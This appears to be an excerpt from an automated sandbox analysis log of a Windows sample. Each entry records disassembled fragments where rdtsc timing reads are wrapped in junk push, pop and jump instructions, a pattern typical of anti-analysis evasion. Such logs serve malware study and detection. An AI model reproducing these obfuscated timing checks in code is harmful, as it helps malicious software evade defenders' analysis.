Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD1233 second address: CD1253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F8AF15A7F94h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8AF15A7F63h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD1253 second address: CD126E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF10CF437h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD14FD second address: CD1501 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD1501 second address: CD1516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F8AF10CF42Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD1516 second address: CD151B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD151B second address: CD153D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F8AF10CF426h 0x0000000a jmp 00007F8AF10CF438h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD1DAF second address: CD1DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD1F4C second address: CD1F50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD1F50 second address: CD1F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD7F88 second address: CD7F8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD7F8C second address: CD7FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8AF15A7F5Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD6A26 second address: CD6A2C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD6A2C second address: CD6A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD6A38 second address: CD6A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD6BC2 second address: CD6BCB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD6BCB second address: CD6BD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD6F7F second address: CD6FAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8AF15A7F5Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F8AF15A7F67h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD6FAB second address: CD6FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8AF10CF438h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD6FC8 second address: CD6FDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F5Ch 0x00000007 pushad 0x00000008 je 00007F8AF15A7F56h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD6FDF second address: CD6FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD7142 second address: CD717C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007F8AF15A7F56h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F8AF15A7F5Ch 0x00000014 jo 00007F8AF15A7F70h 0x0000001a jmp 00007F8AF15A7F68h 0x0000001f push eax 0x00000020 pop eax 0x00000021 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD72ED second address: CD7303 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8AF10CF42Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD7303 second address: CD731E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F61h 0x00000007 jnp 00007F8AF15A7F56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD731E second address: CD733D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8AF10CF42Ch 0x00000008 je 00007F8AF10CF426h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 jl 00007F8AF10CF432h 0x00000017 jbe 00007F8AF10CF426h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD733D second address: CD7344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD74BC second address: CD74D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8AF10CF431h 0x00000009 jns 00007F8AF10CF426h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD761D second address: CD7623 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD7623 second address: CD7628 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD7628 second address: CD7653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8AF15A7F56h 0x0000000a popad 0x0000000b jmp 00007F8AF15A7F5Fh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007F8AF15A7F56h 0x0000001b js 00007F8AF15A7F56h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD7653 second address: CD7664 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnc 00007F8AF10CF426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD7A1F second address: CD7A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CD7A25 second address: CD7A6E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8AF10CF426h 0x00000008 jmp 00007F8AF10CF42Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F8AF10CF437h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F8AF10CF436h 0x0000001b jc 00007F8AF10CF426h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CDFB42 second address: CDFB4A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CE5968 second address: CE5995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F8AF10CF430h 0x0000000a jmp 00007F8AF10CF432h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CE5995 second address: CE5999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CE8190 second address: CE81AC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F8AF10CF437h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CE7CD7 second address: CE7CF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F68h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CE7E53 second address: CE7E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007F8AF10CF426h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CEC032 second address: CEC037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CEC037 second address: CEC077 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8AF10CF438h 0x00000008 jmp 00007F8AF10CF432h 0x0000000d jmp 00007F8AF10CF42Ch 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push ebx 0x00000015 js 00007F8AF10CF42Ch 0x0000001b jne 00007F8AF10CF426h 0x00000021 pushad 0x00000022 jg 00007F8AF10CF426h 0x00000028 pushad 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CF05B5 second address: CF05D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CF05D2 second address: CF05E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F8AF10CF426h 0x00000009 jp 00007F8AF10CF426h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CF05E8 second address: CF05EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CF0754 second address: CF0760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8AF10CF426h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CF0760 second address: CF076F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 jp 00007F8AF15A7F56h 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CF076F second address: CF0779 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8AF10CF432h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CF08A1 second address: CF08A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CF08A5 second address: CF08C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F8AF10CF43Bh 0x0000000c jmp 00007F8AF10CF435h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CF0A04 second address: CF0A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CF0A0A second address: CF0A0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CF0C8A second address: CF0C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CF0E01 second address: CF0E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8AF10CF42Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CF1A0B second address: CF1A44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8AF15A7F69h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8AF15A7F68h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CF7320 second address: CF7324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CF7324 second address: CF733B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CF733B second address: CF7340 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CF7340 second address: CF7349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CF7349 second address: CF734D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CF6A91 second address: CF6A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CF6A97 second address: CF6AAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8AF10CF426h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F8AF10CF42Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CF6AAD second address: CF6AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CF6AB1 second address: CF6AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CFDA89 second address: CFDA8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CFDA8F second address: CFDAA9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8AF10CF426h 0x00000008 jmp 00007F8AF10CF42Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CFDDB6 second address: CFDDEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8AF15A7F64h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jbe 00007F8AF15A7F56h 0x00000012 jmp 00007F8AF15A7F63h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CFDDEB second address: CFDDFF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007F8AF10CF426h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F8AF10CF426h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CFDDFF second address: CFDE1F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8AF15A7F56h 0x00000008 jnl 00007F8AF15A7F56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ecx 0x00000013 push eax 0x00000014 jmp 00007F8AF15A7F5Ah 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CFE0EB second address: CFE0FB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8AF10CF42Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CFE0FB second address: CFE105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8AF15A7F56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CFE105 second address: CFE109 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CFE921 second address: CFE925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CFE925 second address: CFE929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CFF1A1 second address: CFF1BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F68h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CFF1BD second address: CFF1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8AF10CF42Bh 0x0000000e push ebx 0x0000000f jmp 00007F8AF10CF435h 0x00000014 pushad 0x00000015 popad 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: CFF1EA second address: CFF1EF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D045C4 second address: D045C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D045C8 second address: D045CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D045CE second address: D045E0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8AF10CF42Ch 0x00000008 js 00007F8AF10CF426h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D045E0 second address: D045E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D045E4 second address: D045FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007F8AF10CF42Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D045FC second address: D0460A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8AF15A7F56h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D0395E second address: D03963 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D03963 second address: D03969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D03969 second address: D03993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8AF10CF436h 0x00000009 js 00007F8AF10CF426h 0x0000000f popad 0x00000010 pushad 0x00000011 jns 00007F8AF10CF426h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D03AED second address: D03B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8AF15A7F62h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D03B07 second address: D03B0D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D03B0D second address: D03B27 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007F8AF15A7F56h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jl 00007F8AF15A7F58h 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D03E5B second address: D03E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D04006 second address: D0400C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D0400C second address: D0402A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jnp 00007F8AF10CF42Ch 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 jp 00007F8AF10CF426h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D0402A second address: D04035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D0418A second address: D0418E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D0418E second address: D041B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8AF15A7F68h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D041B0 second address: D041BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8AF10CF426h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D11EFC second address: D11F07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F8AF15A7F56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D100DF second address: D10114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF10CF437h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F8AF10CF432h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
